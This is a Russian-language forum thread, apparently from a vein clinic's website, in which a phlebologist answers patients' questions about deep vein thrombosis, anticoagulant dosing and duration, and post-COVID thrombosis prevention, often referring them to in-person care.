Заочно Ваши проблемы не решить. По крайней мере я в этой ситуации ничего посоветовать не могу. Надо видеть ногу и знать всю ситуацию в деталях, а не в таком пересказе.

Ответить

Здравствуйте доктор! Мне 66 лет. В феврале 2022г. случилась фибриляция (мерцательная аритмия). В анамнезе: ОНМК в 2014г.Назначили ксарелто 20мг. пожизненно из- риска инсульта. Так как много других заболеваний ( остеохондроз,хр.синусит,гол.боли и др.) ,приходится принимать другие препараты. Я почитала , что с ксарелто мои препараты не сочетаются. Например НПВП, антибиотики и другие. Приходится терпеть боль. Разрешен парацетомол , но слабо помогает. После приема ксарелто повысилась кровоточивость из носа, десен. Можно ли уменьшить дозу до 15 мг.? Может подскажете какой антибиотик можно? Спасибо.

Простите, но Ваши вопросы вне моей компетенции. Их нужно адресовать кардиологу, по антибиотику решает тот доктор, который назначает антибиотик. Я занимаюсь заболеваниями вен и венозными тромбозами, это другая сфера.

Ответить

Здравствуйте, беременна срок 11 недель. В больницу поступила с сильным токсикозом, но в результате лечения на 3 сутки после капельницы образовался тромб. Стоял катетер, на узи выявили окклюзивный тромбоз подкожной вены 1,5 см. Рука очень сильно опухла и болит пр малейшем движении. Назначили компресс с бетадином, после него появилось раздражение на коже. И 7 дней раззжижающий укол фраксипарина в живот по 0,6 мг. Все правильно? В аннотации фраксипарина есть противопоказания беременности 1 и 2 триместр, как это может отразится на ребёнке?

Низкомолекулярные гепарины, в том числе фраксипарин, несколько десятилетий разрешены во всем мире для профилактики и лечения тромбозов у беременных на любых сроках беременности как безопасные и эффективные препараты. 

Ответить

Здравствуйте, Евгений Аркадьевич. Сразу оговорюсь, что пишу Вам из Украины. В связи с обстановкой речи об очной консультации и каких либо обследованиях не идет. Поэтому же поздновато сообразила в чем тут дело((( Теперь времени терять больше нельзя. Муж 46 лет. В 2021 дважды перенес Cоvid. Сейчас ТГВ голени, 6й день от начала симптомов (боль, онемение, распирание, жжение, отек) + подозреваю компонент ТЭЛА (явная одышка при небольшой нагрузке, иногда кашель). Вчера был эпизод отечности и онемения в руках выше локтей. Весь день сильная головная боль. Последние 3 дня принимал Упсарин по 2-3 табл/сут. (частенько его так пьет короткими курсами из-за головных болей). Почитала Ваши ответы пациентам тут и на Русмедсерв. Наметила лечение: Ксалтро 15мг*2 – 3 недели, далее в дозе 20мг продолжить курс до 3 мес. Трентал 600 в сутки. Компрессия (эл. бинт или трикотаж – смотря что раздобуду сейчас). Учитывая, что нельзя исключить флотирующий тромб, планирую продлить постельный режим. Вопросы: 1. Одобряете ли Вы такую схему лечения? Нужно ли что либо корректировать/дополнить? 2. Есть ли все еще смысл в стартовой дозе Ксалтро 30мг учитывая что лечение начнется на 6й день от начала симптомов? (с одной стороны боюсь этого тромбоза, с другой кровотечения (ранее часто принимал Упсарин, мало ли…) 3. Прокомментируйте, пожалуйста, по постельному режиму. Нужно ли продолжать? Сколько дней? опасаюсь флотирующего тромба((( Заранее благодарю!!!

Основным симптомом, который должен трактоваться как возможный тромбоз глубоких вен, является отек одной нижней конечности. Все остальное (онемение, распирание, жжение) не характерно для ТГВ. Если нет возможности показаться врачу очно — представляется разумным считать, что отек одной ноги из-за ТГВ и начать антикоагулянтную терапию. Ксарелто в такой ситуации принимается по инструкции (30 мг в сутки 3 недели, потом переход на 20 мг в сутки), старт с 30 мг отсчитывается от начала лечения, а не от начала симптомов. Никакие дополнительные лекарства (трентал и ему подобные) в довесок к Ксарелто не нужны. Ограничение подвижности скорее минус, чем плюс. В любом случае, вряд ли имеет смысл ограничивать подвижность больше 2-3 дней от начала лечения антикоагулянтами.

Ответить

Здравствуйте, уважаемый Евгений Аркадьевич! Мужу 65 лет, 19.03.22 впервые возникла фибрилляция предсердий, купирована кордароном в течение первых суток. Назначили с профилактической целью Карелто 10 мг 1 раз в сутки в течение месяца. Сопутствующие заболевания — гипертоническая болезнь, ИБС. В анамнезе язва 12- перстной кишки, повышенная кровоточивость на фоне приёма гинко билоба в виде геморроидального кровотечения, дважды в анамнезе кровотечения из мочевого пузыря. Может вообще не принимать ксарелто или уменьшить дозу до 2,5 мг? Принимает препарат пока в течение 2 дней.

Вопрос вне моей компетенции, это нужно обсуждать с кардиологом.

Ответить

Назначили эликвис. Пил неделю в больнице, а потом дома 2 недели по 2.5 м.г в день, на ночь. Общий приём составил 3 недели. Нужно ли как-то специально сходить с этой дозировки, или просто прекратить пить?

Антикоагулянты не нужно отменять «ступенчато».

Ответить

Влияет ли ксарелто на показателе коагулограммы? Нам сказали сдать анализ и оценить , нужно ли вообще пить ксарелто или нет, тк была она назначена просто так врачем . Мы сдали анализ , но сдали его при приеме лекарства , будет ли это влиять на правдивость исследования ? Или надо пересдавать ?

Не влияет. Нужно пить антикоагулянты или нет — НЕ ОПРЕДЕЛЯЕТСЯ по анализам. 

Ответить

Здравствуйте, огромное спасибо что ведёте эту рубрику! Подскажите, пожалуйста,в декабре у меня обнаружили ТГВ левой конечности(ПБВ,ПоВ,ЗББВ).Три недели принимала Ксарелто по 15 мг два раза в день,потом и в настоящее время принимаю по 20 мг в день и ношу компрессионный чулок 2 класса.18 марта сделала УЗИ и показало ПБВ -реканализация 30-40 процентов,ПоВ -до 50 процентов.Врач говорит,что очень плохо(мне 36 лет),и что нужно поменять Ксарелто на варфарин по 5 мг в день или квадрипарин 0,4 п/п 2 раза в день 7-10 дней.Как вы считаете,нужно ли бросать пить Ксарелто и переходить на другое лекарство?Если да,то что лучше выбрать из лекарств и как переходить с Ксарелто на другое?Что может влиять на плохую реканализацию?

Дикость какая-то. Антикоагулянты НЕ ВЛИЯЮТ на реканализацию. Это невозможно даже просто по их механизву действия. Они не дают образоватьсян новым тромбам. Это первое.

Второе. Нет никаких правильных (хороших) или неправильных (плохих) сроков реканализациию Нет каких-то норм реканализации. Она вообще почти не имеет значения. Значение имеет состояние ноги, а оно может быть хорошим при плохой реканализации и может быть плохим при отличной реканализации. И лечение должно быть направлено на на узи-картинку, а на состояние ноги.

Тртеье. Варфарин со всех точек зрения однозначно хуже, чем любой прямой оральный антикоагулянт (ксарелто, эликвис, прадакса).

Резюме. Вам нужно не лекарство менять, а врача.

Ответить

Спасибо большое вам за ответ! Скажите,а такие уколы как Клексан или Квадрапирин не действеннее чем Ксарелто?Или лучше не менять Ксарелто и не пробовать ничего другого?

Не действеннее.

Ответить

Здравствуйте, после ковида обнаружили тромбоз одной из глубоких вен нижних конечностей. Назначили ксарелто 15мг 1 раз в день. Пила месяц, повторное УЗИ показало что тромб рассосался,вены полностью проходимы. Врач сказал закончить пить ксарелто, и пить тромбоас и магнелис в6.Как правильно перейти с одного препарата на другой и не маленький ли курс я пропила ксарелто (35дней)?

Аспирин не рекомендуется для продленной тромбопрофилактики. Минимальный срок антикоагуляции при любом тромбозе глубоких вен — 3 мес, но возможны исключения из этого правила. Для правильной оценки нужно знать все детали случая. Магнелис к тромбопрофилактике никакого отношения не имеет.

Ответить

Здравствуйте, подскажите пожалуйста до какого срока беременности можно принимать Эниксум, чтобы избежать кровотечения в родах или кесаревом стечении. Спасибо.

Есть определенные правила как готовится родоразрешение при необходимости получения НМГ, когда происходит переход на НФГ («простые» гепарины) или отмена, как быть в случае необходимости экстренного родоразрешения и т. п.. Планировать это нужно с акушером-гинекологов того учреждения, где собираетесь рожать. 

Ответить

Добрый вечер. Спасибо за ответ. Но я не поняла как мне быть. Извините за назойливость. Дело в том, что я на протяжении 2,5 лет принимаю кардиомагнил. 29.06.2021 у меня было тотальное эндопротезирование тазобедренного сустава. 3 мес. принимала Тромбо АСС, затем и по настоящее время — кардиомагнил. В августе 2021 и феврале-марте 2022 переболела ковидом. Результаты от 09.03.2022: МНО 1,08 СРБ — 2,14 витамин Д 25,44, остальные — в пределах нормы. Доктор посоветовал — Эликвис 2,5 — 2 раза в день в течение месяца. А как быть с кардиомагнилом в моем случае. Заранее благодарю..

Не знаю как. Я вообще в Вашем рассказе не вижу оснований ни для приема аспирина, ни для приема антикоагулянтов.

Ответить

Добрый день. Подскажите пожалуйста, возможно ли совместное применение Эликвис и Кардиомагнил после перенесенного коронавируса. Спасибо за ответ.

Я бы задался вопросом — зачем такое сочетание? Сочетание антикоагулянтов и дезагрегантов значительно повышает риск кровотечений, а польза от него есть только в особых, весьма редких ситуациях.

Ответить

Здравствуйте. После вторых родов был тромбофлебит на правой ноге (в районе изгиба, с задней стороны коленки). Сразу сделали узи нижних конечностей, сказали,что не имеет так называемого хвоста, он не страшен, лечение помогло, тромб исчез. Гинеколог, сосудистый хирург и флеболог сказали, что никакие гормональные таблетки в качестве контрацепции пить нельзя. Но побывав на посл приеме у другого гинеколога, тот сказал,что можно пить Джес плюс, тк по анализам у меня все нормально, и доза у этих таблеток маленькая (в качестве сравнения привел Мидиану, которую я около года пила в качестве контрацепции после первых родов). Спираль ставить боюсь, пусть даже негормональный, боюсь сращения, выпадения, а также других последствий, тк гинеколог, к которому я в посл раз обратилась, предупредил меня о них, сказав, что это инородное тело, и нельзя сказать однозначно,что гормональные пить нельзя, а спираль можно. Советовал при наступлении уже 3их месячных прием Джес плюс и через 3 месяца прийти снова на прием, рассказать о самочувствии, как дела льстоят с венами и пр.Лечение тромбофлебита закончила в конце января, в конце марта-начале апреля должны начаться третьи месячные. Как мне быть? Боюсь пить гормональные. Права нога у меня слегка больше левой в районе икры, возможно это из-за варикоза. Флеболог сказал обратиться только осенью и раз в год делать узи нижних конечностей и на данный момент все нормально. Сосудистый хирург рекомендовала два раза в год по два месяца пить Детралекс.

По Вашему описанию неясно, был ли тромбоз в глубоких венах или в поверхностных, и если в поверхностных — в варикозных венах или в неварикозных. От этого может зависеть решение Ваших вопросов. Пока скажу так — в целом после любого венозного тромбоза (даже в поверхностных венах) комбинированные средства контрацепции противопоказаны, даже низкодозовые. Внутриматочные системы (медь-содержащие или на левоноргестреле — можно). Детралекс к этим вопросам не имеет никакого отношения.

Ответить

Добрый день, скажите через сколько часов можно начать принимать прадакса 110мг,после приема кардиомагнила 75мг.

Задайте вопрос врачу, который назначил переход. Без рассмотрения конкретной ситуации вопрос не имеет смысла.

Ответить

Добрый день, Евгений Аркадьевич. У меня тромбоз ПБВ. Подскажите пожалуйста, я принимаю ксарелто. Можно ли совмещать прием ксарелто с витамином В12? В инструкции витамина В12 написано: соблюдать осторожность у лиц склонных к тромбообразованию. С этим вопросам обращался к многим врачам, кто говорит можно, кто говорит нельзя, а кто говорит не знаю. А какое ваше мнение по этому вопросу? С уважением, Александр.

Можно. Если у препаратов витамина B12 и есть протромботический эффект — он полностью нивелируется антикоагулянтом. Но я думаю, что никакого протромботического эффекта у витаминок нет, это «перестраховка» производителя.

Ответить

Обнаружили тромбоз глубоких вен. Нахожусь в Америке Был в скорой помощи. Там и назначили Элеквсис по 10 мг 2 раза/сут в течение 7 дней, затем 5 мг 2 раза/сут. В течение 3 месяцев. Я не могу выехать пока отсюда и не могу сходить к доктору так как нет страховки. Нога пока еще отекает. Но хожу нормально. А до этого хромал и боль с икроножной мышцы перешла к паху. Ношу компрессионной чулок 2 ст. Можно ли мне прекратить пить элеквис. 3 месяца скоро истекают. И как правильно прекращать его пить. Просто перестать принимать или уменьшать срок постепенно. и как постепенно. Понимаю, что нет УЗИ… Но что посоветуете.

Я ответил на этот вопрос от 28.02.2022. Не нужно дублировать.

Ответить

Обнаружили тромбоз глубоких вен. Нахожусь в Америке Был в скорой помощи. Там и назначили Элеквсис по 10 мг 2 раза/сут в течение 7 дней, затем 5 мг 2 раза/сут. В течение 3 месяцев. Я не могу выехать пока отсюда и не могу сходить к доктору так как нет страховки. Нога пока еще отекает. Но хожу нормально. А до этого хромал и боль с икроножной мышцы перешла к паху. Ношу компрессионной чулок 2 ст. Можно ли мне прекратить пить элеквис. 3 месяца скоро истекают. И как правильно прекращать его пить. Просто перестать принимать или уменьшать срок постепенно. и как постепенно. Понимаю, что нет УЗИ… Но что посоветуете.

3 месяца — минимально рекомендуемый срок антикоагуляции (эликвис) для защиты от дальнейшего распространения тромбов, появления новых и развития тромбоэмболии. Нередко имеет смысл продлить прием препарата до 6-12 месяцев, но нужно это или нет — может решить только врач очно. Если прекращать прием — то можно просто перестать принимать.

Ответить

ДОБРЫЙ ДЕНЬ.ПОДСКАЖИТЕ ,ПОЖАЛУЙСТА,КАКОЙ СУТОЧНОЙ ДОЗОЙ ЭЛИКВИСА МОЖНО ЗАМЕНИТЬ КСАРЕЛТО 20 МЛГ

Ксарелто при венозном тромбозе первые 3 недели принимают 15 мг х 2 раза в сутки (30 мг в сутки), а потом переходят на 20 мг в сутки.

Для Эликвиса режим иной: 1 неделя 10 мг х 2 р в сутки, затем 5 мг 2 раза/сут.  

То есть, если по Ксарелто Вас перевели на 20 мг в сутки — значит прошло более 1 недели, и для Эликвиса доза будет 5 мг 2 раза/сут.

Ответить

Здравствуйте. Мужчина, 40 лет. В 2019 г. обнаружен илеофеморальный тромбоз глубоких вен левой нижней конечности. Острый или подострый. После терапии ривароксабаном — в одних венах полная реканализация, в других — частичная, значительная. Флотирующих тромбов нет. Ориентируясь на информацию о тромбофилии на Вашем сайте, скажу, что тромбофилии нет. При необходимости могу предоставить дополнительную информацию. Вопрос: изложенное состояние является абсолютным противопоказанием к тому, чтобы быть донором крови, или это зависит от случая? Если от случая, то что необходимо учитывать? Спасибо.

К сожалению, не могу Вам ответить на этот вопрос — не моя компетенция. Перенесенный венозный тромбоз в регламентирующих документах как противопоказание не значится, но эти документы не охватывают все ситуации. Думаю, Вам нужно задать этот вопрос в любое учреждение «Службы крови», которое занимается забором донорской крови.

Ответить

Здравствуйте! Подскажите пожалуйста, принимала 2 недели ксарелто, после ковида и пневмонии с поражением 15%, врач сказала отменить и назначила Аскорутин. Сомневаюсь в компетентности врача, другие специалисты у нас пока не принимают. Можно ли сразу отменять ксарелто и вместо него перейти на Аскорутин? И подскажите пожалуйста, не влияют ли эти препараты на давление? Начались проблемы, 160/100, 150/100. Мне 33 года.

Уважаемая Ксения, не нужно дублировать сообщения, я отвечаю, когда есть возможность. Ксарелто после выздоровления от ковида нужен только если есть какие-то особые факторы риска развития тромбозов со стороны вашего здоровья («организма»), например, выраженное ожирение, серьезные хронические заболевания и т.п. В таких случаях профилактическая доза антикоагулянта назначается на срок до 30 дней. Аскорутин к профилактике тромбозов отношения не имеет, с антикаогулянтов на него не «переходят». Нужен ли он Вам по другим причинам — не моя компетенция. Ни ксарелто, ни аскорутин на артериальное давление не влияют.

Ответить

Добрый день. При Д димере 0,17 можно исключать острый тромбоз?

Если это ниже верхней границы референсного значения («нормы»), указанного лабораторией — то можно.

Ответить

Добрый день, болела короновирусом, принимала эликвис 5 мг 2 раза в день 3 недели. Сдала анализ на МНО — 1,03, врач сказала отменить прием эликвиса. Сразу же, в первый день отмены начали болеть вены в голени и под коленями, боль продолжается уже 3 день. Что делать ? Может нельзя было прекращать пить эликвис так рано ? Нужно ли сделать УЗИ сосудов ног ? Мне 56, склонность к варикозу, среднее течение ковида с приемом антибиотиков.

Описанная картина вряд ли связана с венами. Если есть сомнения — обратитесь к врачу очно. 

Ответить

Здравствуйте. Женщине 72 года, диабет 2 типа, трофические язвы на стопе. Результат дуплекса нижних конечностей: ОБА справа стеноз 75%, слева -85%. НПА справа 70-80% стеноз, слева до 85%. ГБА справа стенох до 55%, слева субокклюзия. ПКА окклюзия с обеих сторон в дистальном сегменте. артерии стопы и голени множественные окклюзии, с сегментарным кровотоков. Возьметесь ли вы за лечение?

Здравствуйте, я не занимаюсь артериальной патологией, это к сосудистому хирургу.

Ответить

Добрый день! Подскажите пожалуйста доктора в Москве. 50 лет. Был случай ТГВ. Варикоз. Неуточненная тромбофилия. После ковида проблема с подбором дозировки ксарелто. Благодарю за помощь.

Вопрос не сформулирован, но замечу, что Ксарелто и другие прямые оральные антикоагулянты (Эликвис, Прадакса) подбора дозы не требуют, они принимаются в фиксированной дозе в зависимости от клинической ситуации.

Ответить

Здравствуйте, уважаемый доктор. проходил лечение от тромба нижней конечности в стационаре, потом амбулаторно. спустя 3 мес тромб исчез. Вопрос: для профилактики тромба что лусше принимать и в какой дозировке. ксарелто 2,5 х 2 раза в сутки, ксарелто 10 мг раз в сутки или Клопидогрел 75 мг в сутки,или другой препарат. ИНтересует именно Ваше мнение

Здравствуйте. 3 месяца — это минимально достаточный срок антикоагуляции. Ключевой вопрос — а нужна ли продленная тромбопрофилактика. Решение принимает очно с учетом многих факторов. Если нужна — дезагреганты (в т.ч. клопидогрель) не рекомендуются. При продлении с 3 до 6 мес для Ксарелто рекомендованная доза — 20 мг в сутки, при продлении свыше 6 мес используются редуцированная доза Ксарелто — 10 мг в сутки. Именно эти дозировки испытаны в исследованиях и только для них определена эффективность и риски.

Ответить

Евгений Аркадьевич доброго дня! Скажите пожалуйста имеется ли опасность и неблагоприятное воздействие при коротких (до 2 часов) перелетах на самолете. Тгв перенёс год назад при тяжелой форме ковид. Спасибо

Перелет до 2 часов не считается фактором, повышающим риск тромбозов.

Ответить

После перенесенного ковида принимаю Эликсабан в дозировке 2. 5 2 раза в сутки. Врач прописал принимать так в течение 30 дней. Но как выходить из приема не уточнил. Скажите, нужно ли перед прекращением приема данного препарата начать снижать дозу или на 30 день приема просто закончить его прием. Спасибо.

Просто закончить.

Ответить

Добрый вечер доктор, подскажите пожалуйста,у моей мамы были отеки ног внизу и покраснение,врач поставил диагноз лимфостаз обеих ног,ХСВН 2 степени,назначил нормовен,мовиназа,трентал,мазь Троксевазин,теперь ноги приобретают временами синюшный цвет,такое может быть?чтобы вы посоветовали при таких диагнозах,чтобы облегчить состояние

Такие препараты, как и любые другие, бесполезны в лечении лимфедемы. Лимфедема не лечится лекарствами. Поэтому у меня нет доверия и к поставленному диагнозу. Обратитесь к другому специалисту для получения второго мнения по диагнозу. Лучше в клинику, которая занимается лечением лимфедемы, чтобы с этим уже точно разбораться.

Ответить

Добрый день. Можно ли по повышенному Д димеру и фибриногену предполагать наличие тромбоза. У меня при ТГВ И ТЕЛА мелких ветвей лёгкого Д димер был выше нормы в 5 раз, фибриноген тоже был выше нормы. Сейчас после приёма ксарелто на протяжении 18 месяцев отменён его приём, как проверять возможный повторный тромбоз? Ведь в начале при тромбозе анализы были далеко не в норме. Есть ли смысл сейчас опять проверять Д димер, фибриноген?

Повышенный Д-димер не используется для диагностики тромбоза, так как может повышаться от множества причин. Определение уровня Д-димеров применяется только для исключения тромбоза, не повышен — острого тромбоза нет. 

Ответить

Добрый день, доктор. Болеем ковидом впервые, привиты дважды, на мой взгляд, болеем не тяжело. Нужно ли нам (55лет) принимать антикоагулянты? Не принимали сейчас и не принимали никогда. Очень много информации о необходимости принимать, о массе людей с инсультами после ковид и тромбами. Недавно умер молодой сосед на третий день заболевания, внезапно, дома(. Что можно и нужно ли принимать? Возможно, нужно сдать анализы? Врачи очень противоречивы в своих назначениях(

Тактика защиты от тромбоза прописана во временных методических рекомендациях минздрава, которые регулярно обновляются. Последняя версия — декабрь 2021. В целом эти рекомендации соответствуют мировым подходам к защите. 

При амбулаторном лечении ковид инфекции при ее средне-тяжелом течении антикоагулянты для профилактики нужны, если есть дополнительные факторы риска тромбозов и нет повышенного риска кровотечения. Оценку этих факторов проводит врач очно. При легком течении — антикоагулянты обычно не нужны.

Ответить

Здравствуйте подскажите у меня такая ситуация , лежала в Боткинской больницы беременная с 35 неделе по 38 , выписалась под отказ на 38 неделе так как тесты показывали всегда положительные , в платной клинннике сделали и отрицательный . По рекомендации сказали колоть эниксум 0,4 и принимать железо . Я родила ребёнка и пошла гематологу с анализами . Д Дример у меня 756 и врач прописала клексан 0,2 и мальтофер . Я читаю что при ГВ эти препараты строго запрещены . Стала их принимать и малышке стало не очень , беспокоят колики сильно . Может быть что лечение мое повлияло на здоровье малышки ? Огромное Спасибо за ответ .

Во всем мире гепарин — это основной антикоагулянт, который используется для защиты от тромбозов во время грудного вскармливания. К коликам гепарин вряд ли имеет отношение.

Ответить

Здравствуйте, 31.01.21 болела ковид19 из ковидного госпиталя попала в ковидную гинекологию с разрывом трубы( провели лапаротомию). 2 переливания крови. Загущена кровь, вен не было видно. Для введения лекарств вшили переферический катетер в шею. С 11.01.22 пила эликвис 1 р в день — 1 мес. Затем назначили на 3 мес. Плавикс (клопидогрел 75мг-1р в сутки). Скажите пожалуйста насколько необходимо такое долгое лечение?На какие показатели крови обращать внимание? И ещё, я начала приём плавикс вечером в 20. 00,затем прочла, что его лучше принимать в утренние часы. Подскажите пожалуйста как правильно сместить приём препарата?

Это вопросы не для заочного обсуждения и советов, я тут помочь не могу.

Ответить

Евгений Аркадьевич, подскажите пожалуйста, может ли приём антидепрессантов (золофт, тералиджен) каким-то образом повлиять на тромбообразование? (Был тгв голени, теперь переживаю из-за любого препарата)

Антидепрессанты не замечены во влиянии на систему гемостаза, не усиливают тромбообразование. Вообще основные значимые эффекты всегда прописаны в инструкции, это, по сути, нормативный документ, на нее и следует ориентироваться в первую очередь.

Ответить

Принимаю Детралекс (два раза в год для профилактики и лечения варикоза). Заболела коронавирусом. Врач прописал тромвовазим. Возможно ли совместное применение этих препаратрв? И есть ли смысл принимать их одновременно?

Детралекс не является средством профилактики варикоза. Тромбовазим не защищает от тромбозов и не входит ни в какие рекомендации по такой защите.

Ответить

Здравствуйте! Можно ли принимать Эликвис при пониженых тромбоцитах, но повышенном фибриногене и АЧТВ 21,после перенесенной короны. Человеку 68 лет отягощен анамез сд 2 тип и инсульт несколько лет назад? Не снизит ли ещё больше тромбоциты Эликвис?

Антикоагулянты не влияют на уровень тромбоцитов. Можно ли назначить антикоагулянт на фоне тромбоцитопении (пониженный уровень) — зависит от степени тромбоцитопении и другиф факторов (от клинической ситуации во всех смыслах этого термина). Результаты анализов — только элемент принятия решения.

Ответить

Здравствуйте! Скажите пожалуйста, как поступить лучше? Принимал ксарелто 20 мг 3.5 месяца, решил перестать пить его из за финансовых проблем. Прошло 12 дней, снова нога начала болеть. Можно ли снова продолжить принимать ксарелто по 20 мг или нужно опять начинать с 15 мг два раза в день в течение трех недель? Буду очень благодарен вам за помощь!

Ксарелто — не лекарство от болей в ноге. Нужно возобновлять прием или нет зависит от того, соблюдены ли оптиамльные сроки антикоагуляции и есть или нет повтор тромбоза. В первом случае возобновление с прежней дозы. Во вотором — лечение как нового случая. Но понять это можно только при очном осмотре и обследовании.

Ответить

Добрый вечер! На фоне ковида маме 83 года назначен эликвис 2.5 2 раза в день пьёт 2.5 месяца. Д-димер в декабре 0.67, а в начале февраля 8.15. Что это может быть? Какие обследования пройти?

Никакое. Повышение Д-димеров само по себе не имеет значения. Нужно ли обследовать зависит от ее соамочусвствия, состояния и жалоб.

Ответить

Добрый день. 18 месяцев назад ТГВ правой ноги, ТЕЛА мелких ветвей правого лёгкого, сильно повышенный Д димер и фибриноген. Через неделю лечения полная реканализация. С того момента 1 год принимал ксарелто 20 и далее принимаю 8 месяцев ксарелто 10. Тромбозов больше не повторялось. Можно ли прекращать приём ксарелто? С одной стороны боюсь за побочку в виде кровотечений, с другой — повторения тромбоза.

Здравствуйте. Базовую, и даже продленную тромбопрофилактику Вы получили. В большинстве случаев этого более чем достаточно. Относится ли Ваш случай к «большинству», или есть какие-то факторы, требующие продления приема антикоагулянтов по такой информации решить невозможно.

Ответить

Здравствуйте, Евгений! Мне 84г. Многолетняя ВБНК. Никакого воспаления в организме нет. Увидев D-димеры 1458 (норма до 500), врач мне назначила Эликвис 2.5мг 2 раза в день. Дезагреганты не пью. Через 2 месяца приёма Эликвиса димеры упали до 810 нг/мл, агрегация тромбоцитов, индуцированная АДФ, – 53% (N -50-84%), АПТВ на фоне такого приёма Эликвиса — 33.2сек (N27.7-40.2). Нужно ли мне, в принципе, принимать прямые антикоагулянты в более высоких дозах и целесообразно ли пить антиагреганты? Спасибо.

Повышение Д-димеров само по себе не является основанием для назначения антикоагулянтов. Нужно учитывать, что повышаться Д-димеры могут от самых разных причин, безотносительно тромбозов, а антикоагулянты могут привести к геморрагическим осложнениям. Дезагрегант для профилактики венозных тромбозов не рекомендуются, нужны ли они Вам по другим причинам — компетенция терапевта. Сочетать антикоагулянты и дезагреганты не следует.

Ответить

Добрый вечер. Прошу прощения, за такой вопрос.у меня перелом левой латеральной лодыжки(без смещения) выписали продаксу 110мг по капсуле в день. Редко болею и опыт с лекарствами не большой. В связи с праздниками и мероприятиями я часто выпивала , но пол часа назад заметила переодичность судороги.начала читать совместимость препарата с алкоголем и мне стало жутко.29 лет

Не увидел вопроса. Явной несовместимости алкоголя и антикоагулянтов нет, но прием алкоголя, особенно «алкогольные эксцессы», повышают риск кровотечений, в том числе за счет травм на фоне опьянения.

Ответить

Здравствуйте доктор. Врач назначил ксарелто 10 и детравенол 1000,подскажите как принимать лекарство? Сразу две таблетки или по отдельности? Спасибо.

Не имеет значения.

Ответить

Здравствуйте Евгений Аркадьевич. Огромная благодарность за ведение данной рубрики, с удовольствием читаю ее и смотрю ролики с Вашим участием на YouTube-канале «Флебологический центр «АНТИРЕФЛЮКС». Хотелось бы узнать мнение специалиста столь высокого уровня, коим Вы являетесь, по моей ситуации. С момента илеофеморального ТГВ левой нижней конечности прошло 5 месяцев. По результатам УЗИ в просвете глубоких вен определяются тромбомассы сниженной и средней эхогенности с реканализацией просвета в НПВ, ОБВ, ПБВ 40-60%, в ПКВ свыше 70%. МНО 1.12. Принимала Ксарелто 20, с декабря 2021 по назначение врача стала принимать Ксарелто 20+20=40мг. МНО 12.01.2022 стало 1.17. С 14 января 2022 по назначению врача принимаю Ксарелто по 50мг ежедневно, 19 января МНО стало 1,23. Лечащий врач предложил еще увеличить Ксарелто 20+20+20 =60мг ежедневно и довести МНО до 2.0, тем самым попробовать увеличить реканализацию до 90%. Ношу качественный компрессионный трикотаж, хожу ежедневно 10км. Заранее благодарю за ответ.

Советую сменить врача. Дозировка ксарелто ни в коем случае не должна подбираться по МНО и вообще подбираться. Увеличивая дозировку до таких значений Вы существенно повышаете риск геморрагических осложнений (кровотечений) без увеличения пользы. Прямые оральные антикоагулянты тем и хороши, что выполняют свою задачу при фиксированных дозах. И задача их — не реканализация, а предотвращение новых тромбозов. На реканализацию антикоагулянты не влияют, это совсем другой процесс.

Ответить

Здравствуйте, Евгений! Мне 84г. Многолетняя ВБНК. Флебэктомия в анамнезе. Высокий фибриноген 5.5г/л. При этом воспаления как бы нет: острофазные белки (СРБ, ферритин) в норме, нейтрофилы не повышены, лабораторных признаков АХЗ нет, РФМК -4. Показатели липидного спектра идеальные (ИА 1.6-2) (на фоне розувастатина 5 мг/сут). Прямые антикоагулянты снижают только D- димеры. На уровень фибриногена они не действуют. Может ли гиперфибриногенемия поддерживаться в моём случае не за счёт его печёночного синтеза, а за счёт выброса из гранул активированных тромбоцитов от венозного стаза? Или вклад тромбоцитарного фибриногена не может быть таким существенным? Спасибо.

 Может ли гиперфибриногенемия поддерживаться в моём случае не за счёт его печёночного синтеза, а за счёт выброса из гранул активированных тромбоцитов от венозного стаза? Или вклад тромбоцитарного фибриногена не может быть таким существенным? Спасибо.

Понятия не имею. В решении клинических задач лабораторные показатели имеют второстепенное, вспомогательное значение. «Лечить анализы» не имеет смысла. Должна быть сформулирована клиническая проблема и определены пути ее решения. Я таковой в Вашем сообщении не вижу.

Ответить

Здравствуйте, Евгений Аркадьевич, подскажите, пожалуйста.У меня месяц назад обнаружили ТГВ нижней конечности.Нога отекает,хотя и ношу чулок 2 класса компрессии.Скажите, можно при тромбозе много ходить?В течении какого времени должен сойти отек ноги?Врачи говорят,что отек при остром тромбозе держится около 3 месяцев.Но меня очень смущает то,что в конце дня одна нога на 2-3 см больше другой

Я считаю, что отек конечности с разницей в окружности на щиколотке более 1 см — это повод активно заниматься устранением отека. У себя в клинике в таких ситуациях мы проводим активную терапию с дренирующим массажем и бандажированием конечности, и переводим пациента на поддерживающую компрессию трикотажа только после того, как отек максимально регрессирует. Подвижность, ходьба, физкультура при этом только приветствуются.

Ответить

Здравствуйте, Евгений Аркадьевич! Очень нужен ваш совет. Чуть меньше 3х месяцев назад у меня случился тромбоз подключичной вены, после этого 2,5 месяца пила ксарелто, через месяц после тромбоза УЗИ показало. что тромб рассосался. Сейчас иногда болит рука, если заработаюсь и забываю дать ей отдых и размять. В связи с необходимостью начать терапию антидепрессантами, обратилась к гематологу за разрешением прерывать терапию немного раньше 3х месяцев, получила добро после сдачи коагулограммы и д-димер, врач только назначил анализы на тромбофилии и пить кардиомагнил. Почитав ваш блог, засомневалась в правильности действий. Подскажите, стоит ли в моей ситуации (у меня это первый случай тромбоза, вызванный возможно малоподвижным образом жизни, рука из-за работы много находится в статичном состоянии), искать тромбофилию? Не глупо ли я поступила попросив отменять ксарелто на 2 недели раньше? Или в моем случае ее нужно было пить 6 месяцев* Есть ли смысл в приеме кардиомагнила?

Вы задаете вопросы, на которые невозможно корректно ответить очно. В общих чертах — обследование на тромбофилию иногда имеет смысл в возрасте до 40 лет, но и то не всегда. Аспирин малоэффективен в профилактике венозных тромбозов. При ТГВ верхних конечностей иногда нужно дообследование на предмет выявления синдрома грудного выхода. Подчеркну — все это не является обязательным, исходить нужно из особенностей конкретного случая.

Ответить

Добрый день Евгений. Каким образом можно оценить риск кровотечения от длительного приёма ксарелто кроме визуальных методов (кровоизлияние в глаз, кровь в моче и т.д.)? Анализы, исследования ?

Риск кровотечения оценивается опросом о прошлом и нынешнем состоянии здоровья с учетом возраста, фоновых болезней и т.п. Факт кровотечения оценивается глазом: кровоизлияние, гематурия и т.п.

Ответить

Добрій день! подскажие пожалуйса, мне 44 года, я курю, врач прописала КОК Джаз, после приема 2 упаковок в правой икроножной мішце появилась боль как после судороги и неного вздулась вена, в мішце прощупіваеся плоній шар размером с яйцо, надо ли прикраиь прием таблеок и к какому врачу иди? Спасибо.

К какому-нибудь. Но точно не через интернет диагностикой заниматься.

